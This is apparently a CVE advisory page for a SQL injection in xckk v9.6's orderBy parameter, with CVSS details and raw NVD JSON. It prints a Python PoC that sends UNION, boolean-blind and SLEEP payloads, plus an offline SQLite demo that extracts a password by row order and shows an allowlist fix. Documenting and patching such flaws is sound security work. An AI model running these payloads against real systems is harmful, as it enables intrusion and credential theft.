Security Vulnerability Report
CVE-2025-60265 CVSS 6.5 MEDIUM

CVE-2025-60265

Published: 2025-10-09 16:15:48
Last Modified: 2025-10-16 15:28:09

Description

In xckk v9.6, the orderBy parameter of the user/list endpoint is not securely filtered before it is used in the SQL query, resulting in a SQL injection vulnerability (CWE-89).

CVSS Details

CVSS Score
6.5
Severity
MEDIUM
CVSS Vector
CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:L/I:L/A:N

Configurations (Affected Products)

cpe:2.3:a:bestfeng:xckk:9.6:*:*:*:*:*:*:* - VULNERABLE
xckk v9.6

PoC / Exploit Code

⚠ For Security Research Only
The following code is for security research and authorized testing only.
python
# CVE-2025-60265 PoC - xckk v9.6 SQL Injection via orderBy parameter
# Target: user/list endpoint
# Vulnerability: orderBy parameter is not securely filtered
import time

import requests

TARGET_URL = "http://target-xckk-host/user/list"
# Request timeout in seconds; keep it above the SLEEP() value used in exploit_time()
TIMEOUT = 15


# Step 1: Verify the SQL injection vulnerability
# Normal request to observe baseline response
def test_normal():
    params = {"orderBy": "id", "page": "1", "limit": "10"}
    resp = requests.get(TARGET_URL, params=params, timeout=TIMEOUT)
    print(f"[Normal] Status: {resp.status_code}, Length: {len(resp.text)}")
    return resp


# Step 2: Inject malicious payload via orderBy parameter
# Using UNION-based injection to extract database info
# Caveat: on MySQL a UNION placed after ORDER BY is rejected (error 1221,
# "Incorrect usage of UNION and ORDER BY"), so this step normally fails for a
# pure ORDER BY sink; Steps 3 and 4 are the reliable checks for this position.
def exploit_union():
    # Example: orderBy=id UNION SELECT 1,username,password,4 FROM users--
    payload = "id UNION SELECT 1,username,password,4 FROM users--"
    params = {"orderBy": payload, "page": "1", "limit": "10"}
    resp = requests.get(TARGET_URL, params=params, timeout=TIMEOUT)
    print(f"[UNION Exploit] Status: {resp.status_code}")
    print(f"Response: {resp.text[:500]}")
    return resp


# Step 3: Boolean-based blind injection to enumerate data
# A blind oracle is the difference between a true and a false condition, so
# the true-case response is compared against a known-false one. Note that
# MySQL only treats "--" as a comment when whitespace follows it; if the
# injected value ends the statement, "-- -" is the more robust terminator.
def exploit_blind():
    # Test if database name length > 5
    true_payload = "id AND (SELECT LENGTH(database()))>5--"
    false_payload = "id AND (SELECT LENGTH(database()))>500--"
    resp_true = requests.get(
        TARGET_URL, params={"orderBy": true_payload, "page": "1", "limit": "10"}, timeout=TIMEOUT
    )
    resp_false = requests.get(
        TARGET_URL, params={"orderBy": false_payload, "page": "1", "limit": "10"}, timeout=TIMEOUT
    )
    print(f"[Blind Exploit] true-case Status: {resp_true.status_code}, Length: {len(resp_true.text)}")
    print(f"[Blind Exploit] false-case Status: {resp_false.status_code}, Length: {len(resp_false.text)}")
    print(f"[Blind Exploit] responses differ: {resp_true.text != resp_false.text}")
    return resp_true, resp_false


# Step 4: Time-based blind injection
# SLEEP() inside ORDER BY is evaluated once per sorted row, so the delay can be
# a multiple of 3 s on a large table; compare against the Step 1 baseline.
def exploit_time():
    payload = "id AND IF(1=1, SLEEP(3), 0)--"
    params = {"orderBy": payload, "page": "1", "limit": "10"}
    start = time.time()
    resp = requests.get(TARGET_URL, params=params, timeout=TIMEOUT)
    elapsed = time.time() - start
    print(f"[Time-based] Elapsed: {elapsed:.2f}s (should be >=3 if vulnerable)")
    return resp


if __name__ == "__main__":
    test_normal()
    exploit_union()
    exploit_blind()
    exploit_time()
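The PoC above treats the endpoint as a black box. The following is an added example, written for this page and not taken from xckk or from the advisory, that models the flaw the description names (a client-controlled value concatenated into ORDER BY) against an in-memory SQLite table so it runs offline. The table, its rows and the passwords are constructed for the demo; MySQL-specific calls from the PoC (database(), SLEEP()) are replaced by SQLite expressions. It shows three things a practitioner wants to confirm: that a bound parameter does not fix an ORDER BY sink (it sorts by a constant), that an expression in the ORDER BY position is enough to build a boolean-blind oracle and pull a column out one character at a time even though a UNION cannot be placed there, and that an allowlist mapping for both column and direction is the fix.

```python
# Added example (not xckk's code): an ORDER BY sink modelled on the CVE
# description, run against an in-memory SQLite table standing in for the
# real database. Table, rows and passwords are constructed for the demo.
import sqlite3

# Constructed sample data: ids are in insertion order, usernames are not,
# so "ORDER BY id" and "ORDER BY username" return distinguishable orders.
SAMPLE_USERS = [
    (1, "zed", "s3cret"),
    (2, "amy", "hunter2"),
    (3, "mia", "pa55w0rd"),
]


def make_db():
    conn = sqlite3.connect(":memory:")
    conn.execute("CREATE TABLE users (id INTEGER PRIMARY KEY, username TEXT, password TEXT)")
    conn.executemany("INSERT INTO users VALUES (?, ?, ?)", SAMPLE_USERS)
    return conn


def ids(rows):
    return [row[0] for row in rows]


# 1. The flaw: the orderBy value is concatenated into the statement text.
def list_users_vulnerable(conn, order_by):
    sql = f"SELECT id, username FROM users ORDER BY {order_by}"
    return conn.execute(sql).fetchall()


# 2. Why developers end up concatenating: a bound parameter in ORDER BY is a
#    constant string, so every row has the same sort key and nothing is sorted.
def list_users_bound(conn, order_by):
    sql = "SELECT id, username FROM users ORDER BY ?"
    return conn.execute(sql, (order_by,)).fetchall()


# 3. The fix: map the client-supplied name onto a server-side allowlist and
#    never let the raw value reach the SQL text. Direction is allowlisted too.
ORDER_COLUMNS = {"id": "id", "username": "username"}
DIRECTIONS = {"asc": "ASC", "desc": "DESC"}


def list_users_safe(conn, order_by="id", direction="asc"):
    column = ORDER_COLUMNS.get(order_by)
    direction_sql = DIRECTIONS.get(direction.lower())
    if column is None or direction_sql is None:
        raise ValueError(f"rejected orderBy={order_by!r} direction={direction!r}")
    sql = f"SELECT id, username FROM users ORDER BY {column} {direction_sql}"
    return conn.execute(sql).fetchall()


def is_rejected(conn, order_by, direction="asc"):
    try:
        list_users_safe(conn, order_by, direction)
    except ValueError:
        return True
    return False


# 4. Boolean-blind oracle through the ORDER BY position. A UNION cannot follow
#    ORDER BY, but any expression can: when `condition` is true the rows come
#    back sorted by id, otherwise by username, and that difference leaks one
#    bit per request.
def blind_oracle(conn, condition):
    payload = f"(CASE WHEN ({condition}) THEN id ELSE username END)"
    baseline = list_users_vulnerable(conn, "id")
    return list_users_vulnerable(conn, payload) == baseline


def extract_password(conn, user_id, charset="abcdefghijklmnopqrstuvwxyz0123456789"):
    """Recover users.password for one row using nothing but the row order."""
    length = 0
    while blind_oracle(conn, f"(SELECT length(password) FROM users WHERE id={user_id}) > {length}"):
        length += 1
    recovered = ""
    for pos in range(1, length + 1):
        for ch in charset:
            probe = f"(SELECT substr(password, {pos}, 1) FROM users WHERE id={user_id}) = '{ch}'"
            if blind_oracle(conn, probe):
                recovered += ch
                break
    return recovered


if __name__ == "__main__":
    conn = make_db()
    print("vulnerable, orderBy=username:", ids(list_users_vulnerable(conn, "username")))
    print("bound ORDER BY ?, orderBy=username:", ids(list_users_bound(conn, "username")))
    print("blind extraction of id=1 password:", extract_password(conn, 1))
    print("safe rejects PoC payload:", is_rejected(conn, "id AND IF(1=1, SLEEP(3), 0)--"))
    print("safe, orderBy=username desc:", ids(list_users_safe(conn, "username", "desc")))
```

The allowlist is a dictionary rather than a regex on purpose: a regex such as `^[a-z_]+$` still lets a caller sort by any column that exists (password hashes included, which is its own oracle), whereas the mapping exposes only the names the endpoint is meant to sort by.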

References

https://gitee.com/bestfeng/xckk (Product)
https://github.com/int-ux/report/issues/1 (Exploit, Third Party Advisory)

Raw JSON Data

JSON
{
  "cve": {
    "id": "CVE-2025-60265",
    "sourceIdentifier": "[email protected]",
    "published": "2025-10-09T16:15:47.687",
    "lastModified": "2025-10-16T15:28:09.467",
    "vulnStatus": "Analyzed",
    "cveTags": [],
    "descriptions": [
      {
        "lang": "en",
        "value": "In xckk v9.6, there is a SQL injection vulnerability in which the orderBy parameter in user/list is not securely filtered, resulting in a SQL injection vulnerability."
      }
    ],
    "metrics": {
      "cvssMetricV31": [
        {
          "source": "[email protected]",
          "type": "Primary",
          "cvssData": {
            "version": "3.1",
            "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:L/I:L/A:N",
            "baseScore": 6.5,
            "baseSeverity": "MEDIUM",
            "attackVector": "NETWORK",
            "attackComplexity": "LOW",
            "privilegesRequired": "NONE",
            "userInteraction": "NONE",
            "scope": "UNCHANGED",
            "confidentialityImpact": "LOW",
            "integrityImpact": "LOW",
            "availabilityImpact": "NONE"
          },
          "exploitabilityScore": 3.9,
          "impactScore": 2.5
        },
        {
          "source": "134c704f-9b21-4f2e-91b3-4a467353bcc0",
          "type": "Secondary",
          "cvssData": {
            "version": "3.1",
            "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:L/I:L/A:N",
            "baseScore": 6.5,
            "baseSeverity": "MEDIUM",
            "attackVector": "NETWORK",
            "attackComplexity": "LOW",
            "privilegesRequired": "NONE",
            "userInteraction": "NONE",
            "scope": "UNCHANGED",
            "confidentialityImpact": "LOW",
            "integrityImpact": "LOW",
            "availabilityImpact": "NONE"
          },
          "exploitabilityScore": 3.9,
          "impactScore": 2.5
        }
      ]
    },
    "weaknesses": [
      {
        "source": "134c704f-9b21-4f2e-91b3-4a467353bcc0",
        "type": "Secondary",
        "description": [
          {
            "lang": "en",
            "value": "CWE-89"
          }
        ]
      }
    ],
    "configurations": [
      {
        "nodes": [
          {
            "operator": "OR",
            "negate": false,
            "cpeMatch": [
              {
                "vulnerable": true,
                "criteria": "cpe:2.3:a:bestfeng:xckk:9.6:*:*:*:*:*:*:*",
                "matchCriteriaId": "899D943E-2D17-4659-9A94-83B6CC22A3FF"
              }
            ]
          }
        ]
      }
    ],
    "references": [
      {
        "url": "https://gitee.com/bestfeng/xckk",
        "source": "[email protected]",
        "tags": ["Product"]
      },
      {
        "url": "https://github.com/int-ux/report/issues/1",
        "source": "[email protected]",
        "tags": ["Exploit", "Third Party Advisory"]
      }
    ]
  }
}